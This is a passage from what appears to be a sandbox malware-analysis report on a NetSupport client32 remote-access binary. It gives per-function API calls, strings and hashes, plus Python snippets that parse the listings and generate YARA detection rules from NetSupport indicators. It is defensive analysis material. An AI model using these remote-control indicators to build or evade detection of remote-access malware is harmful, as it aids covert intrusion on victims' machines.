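               for a, kind in zip(r["args"], r["arg_kinds"]) if kind == "string"}
    return {
        "direct": sorted({r["api"] for r in records if r["subcall"] is None}),
        "subcalls": sorted({r["subcall"] for r in records if r["subcall"]}),
        "by_module": {mod: sorted(names) for mod, names in sorted(by_module.items())},
        "strings": sorted(strings),
        "capabilities": sorted(cap for cap, needed in CAPABILITIES.items() if apis & needed),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(parse_api_lines(SAMPLE)), indent=2))
```

Feeding it the listing above yields the four directly called clipboard/error APIs, the two helper functions `11029A70` and `11110230`, and the `Client32` caption string; the same parser runs unchanged over any other function's APIs block in this report, so a whole export can be reduced to a per-function API inventory for comparison against a known-good NetSupport client32 build.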
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(111EE294,50D94AA1,?,?,?,?,00000000,11181BDE), ref: 110535C4
                                                                                  • LeaveCriticalSection.KERNEL32(111EE294,00000000,?,?,?,?,00000000,11181BDE), ref: 11053789
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • std::exception::exception.LIBCMT ref: 11053635
                                                                                  • __CxxThrowException@8.LIBCMT ref: 1105364A
                                                                                  • GetTickCount.KERNEL32 ref: 11053660
                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 11053747
                                                                                  • LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751
                                                                                    • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$CountEnterException@8ThrowTickXinvalid_argument_free_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                  • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
                                                                                  • API String ID: 2238969640-1197860701
                                                                                  • Opcode ID: a125caa266158cfd1567ef2fce88b3a409ca474b9ba5f2c652a5a1265fbf28b7
                                                                                  • Instruction ID: 9fd56e3a4776fcf28e1c6ce8a1981ca07dec16432dee4cc0167aa7d7c32ba94c
                                                                                  • Opcode Fuzzy Hash: a125caa266158cfd1567ef2fce88b3a409ca474b9ba5f2c652a5a1265fbf28b7
                                                                                  • Instruction Fuzzy Hash: 31517179E062659FDB45CFA4C984AADFBA4FF09348F008169E8159B344F731A904CBA5
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 11153763
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 11153779
                                                                                  • SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
                                                                                  • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 1115389B
                                                                                  • SelectObject.GDI32(00000000,?), ref: 111538C1
                                                                                  • SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
                                                                                  • DeleteDC.GDI32(00000000), ref: 111538D8
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 111538E7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                                  • String ID: @Ls
                                                                                  • API String ID: 602542589-4225762999
                                                                                  • Opcode ID: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                                  • Instruction ID: d520eb4ea94c146294e5bc27ee2bf9e491812ef3a8de5d3ff178baa6803be84b
                                                                                  • Opcode Fuzzy Hash: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                                  • Instruction Fuzzy Hash: 1751FAF5E102289FDB64DF29CD84799BBB8EF89304F4051E9E619E3240E6705E81CF68
                                                                                  APIs
                                                                                  • GetMenuItemCount.USER32 ref: 1101F2B5
                                                                                  • _memset.LIBCMT ref: 1101F2D8
                                                                                  • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F2F6
                                                                                  • _free.LIBCMT ref: 1101F305
                                                                                    • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                    • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                  • _free.LIBCMT ref: 1101F30E
                                                                                  • DeleteObject.GDI32(00000000), ref: 1101F32D
                                                                                  • DeleteObject.GDI32(00000000), ref: 1101F33B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
                                                                                  • String ID: $0$UndoOwnerDraw
                                                                                  • API String ID: 4094458939-790594647
                                                                                  • Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                  • Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
                                                                                  • Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                  • Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 1106F737
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F788
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F7A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeavewsprintf
                                                                                  • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                  • API String ID: 3005300677-3496508882
                                                                                  • Opcode ID: c5c9b37cbf4a9744e401d9b2689a4a4194d5dca95882f922ec684c96c689cda2
                                                                                  • Instruction ID: f86a0a3523b45ae2aa4ac8696085f91b0c00e2f9513f1a57450127c273c63767
                                                                                  • Opcode Fuzzy Hash: c5c9b37cbf4a9744e401d9b2689a4a4194d5dca95882f922ec684c96c689cda2
                                                                                  • Instruction Fuzzy Hash: 17B19F79E003169FDB10CF64CC90FAAB7B9AF89708F50419DE909A7241EB75AD41CF62
                                                                                  APIs
                                                                                  • IsWindow.USER32(00000000), ref: 1104147B
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • SendMessageTimeoutA.USER32(?,0000004A,0006040E,?,00000002,00002710,?), ref: 11041670
                                                                                  • _free.LIBCMT ref: 11041677
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessageSendTimeoutWindow__wcstoi64_free
                                                                                  • String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                  • API String ID: 1897251511-2352888828
                                                                                  • Opcode ID: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                                  • Instruction ID: 7d7d201ace8770d3ab851aba43ef7aa7a0e05de8b0dcb1a0fb6fb2d6540d47c3
                                                                                  • Opcode Fuzzy Hash: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                                  • Instruction Fuzzy Hash: 37717DB5F0021AAFDB04DFD4CCC0AEEF7B5AF48304F244279E516A7685E631A905CBA1
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 110513F9
                                                                                  • CloseHandle.KERNEL32(?,Client,UserAcknowledge,00000000,00000000), ref: 110514DB
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle__wcstoi64_memset
                                                                                  • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                                  • API String ID: 510078033-311296318
                                                                                  • Opcode ID: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                  • Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
                                                                                  • Opcode Fuzzy Hash: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                  • Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick
                                                                                  • String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
                                                                                  • API String ID: 536389180-1339850372
                                                                                  • Opcode ID: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                                  • Instruction ID: 7a2480a0f38ec62df9d6165c4879ba51ca1346fdc5c877313ede350298642e4b
                                                                                  • Opcode Fuzzy Hash: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                                  • Instruction Fuzzy Hash: 8541CD75E022359BE712CFE1D981BA9F7E4FB44348F10056AE83597284FB30E680CBA1
                                                                                  APIs
                                                                                  Strings
                                                                                  • Warning. took %d ms to get simap lock, xrefs: 1110773D
                                                                                  • Warning. simap lock held for %d ms, xrefs: 11107825
                                                                                  • SetTSModeClientName(%d, %s) ret %d, xrefs: 111077FF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$CriticalSection$EnterLeave_strncpy
                                                                                  • String ID: SetTSModeClientName(%d, %s) ret %d$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                  • API String ID: 3891031082-3311166593
                                                                                  • Opcode ID: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
                                                                                  • Instruction ID: d3321afa8f45acf833dece3f06e7fdc0391082dc92555cffabcd4bc49ffbb5d2
                                                                                  • Opcode Fuzzy Hash: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
                                                                                  • Instruction Fuzzy Hash: 6641327AE00A19AFE710DFA4C888F9AFBF4FB05358F014269E89597341D774AC40CB90
                                                                                  APIs
                                                                                  • OutputDebugStringA.KERNEL32(NsAppSystem Info : Unexpected data from NsStudentApp...), ref: 110DD77D
                                                                                  • std::exception::exception.LIBCMT ref: 110DD7B8
                                                                                  • __CxxThrowException@8.LIBCMT ref: 110DD7D3
                                                                                  • OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Closed by 0 bytes RECV...), ref: 110DD841
                                                                                  • OutputDebugStringA.KERNEL32(NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********), ref: 110DD875
                                                                                    • Part of subcall function 110D7F00: __CxxThrowException@8.LIBCMT ref: 110D7F6A
                                                                                    • Part of subcall function 110D7F00: #16.WSOCK32(?,?,?,00000000,00001000,50D94AA1,?,00000000,00000001), ref: 110D7F8C
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  Strings
                                                                                  • NsAppSystem Info : Unexpected data from NsStudentApp..., xrefs: 110DD775
                                                                                  • NsAppSystem Info : Control Channel Waiting For Data..., xrefs: 110DD703
                                                                                  • NsAppSystem Info : Control Channel Closed by 0 bytes RECV..., xrefs: 110DD83C
                                                                                  • NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********, xrefs: 110DD870
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$Exception@8Throw$_malloc_memsetstd::exception::exceptionwsprintf
                                                                                  • String ID: NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********$NsAppSystem Info : Control Channel Closed by 0 bytes RECV...$NsAppSystem Info : Control Channel Waiting For Data...$NsAppSystem Info : Unexpected data from NsStudentApp...
                                                                                  • API String ID: 477284662-4139260718
                                                                                  • Opcode ID: dbd2cdf28a0a0cf71f03d3c226c743d460d308e4e4eed45dc5dc12da83a0402e
                                                                                  • Instruction ID: 0fb2eb5c845aae8e11df8756a30c5633d39706f88fe6ba16aa3ac9f9913de48b
                                                                                  • Opcode Fuzzy Hash: dbd2cdf28a0a0cf71f03d3c226c743d460d308e4e4eed45dc5dc12da83a0402e
                                                                                  • Instruction Fuzzy Hash: 85414B78E002589FCB15CFA4C990FAEFBB4FF19708F548199E41AA7241DB35A904CFA1
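The function blocks in this section are only useful to a responder once they are turned into something searchable. The script below is an added example for this page, not Joe Sandbox's or NetSupport's code: it parses the "APIs / Strings / Similarity" block format shown above into records, flags functions that send WM_COPYDATA (message id 0x4A, the 0000004A argument in the SendMessageA and SendMessageTimeoutA calls listed here) or carry strings from the report's String IDs, and emits a YARA rule from those strings. The sample input is two blocks excerpted and abridged from this section; the marker list (NSMW16Class, CLTCONN.CPP, the e:\nsmsrc\nsm\ build path, NsStudentApp, PolicyChanged, UseNCS) is taken from the String IDs on this page, and treating those as distinctive for NetSupport client32 is this example's assumption, not a vetted signature.

```python
"""Parse Joe Sandbox function-analysis blocks into records and flag NetSupport
client32 indicators. Added example; not Joe Sandbox's or NetSupport's code."""
import re
from dataclasses import dataclass, field

# Constructed sample: two blocks excerpted and abridged from this section of
# the report (indentation and "Download File" link residue removed).
SAMPLE = """\
APIs
• IsWindow.USER32(00000000), ref: 1104147B
  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
• SendMessageTimeoutA.USER32(?,0000004A,0006040E,?,00000002,00002710,?), ref: 11041670
• _free.LIBCMT ref: 11041677
Similarity
• API ID: MessageSendTimeoutWindow__wcstoi64_free
• String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\\nsmsrc\\nsm\\1210\\1210f\\ctl32\\DataStream.h
• Opcode ID: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
APIs
• FindWindowA.USER32(NSMW16Class,00000000), ref: 1103D2E4
• SendMessageA.USER32(00000000,0000004A,0006040E,?), ref: 1103D313
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
• CloseHandle.KERNEL32(?), ref: 1103D364
Similarity
• API ID: CloseFileFindHandleMessageSendWindowWrite
• String ID: CLTCONN.CPP$NSMW16Class
• Opcode ID: 2f3160cb8d4d3e9d4d4fb5de1e8df60238232f5b231a300af43937cf6ba75c4c
"""

# One direct API call: "• name.MODULE(args), ref: ADDR" or "• name.MODULE ref: ADDR".
API_RE = re.compile(r"^• (?P<name>[\w@#:~]+)\.(?P<mod>[A-Z0-9]+)"
                    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")

# Substrings taken from the String IDs in this section. Treating them as
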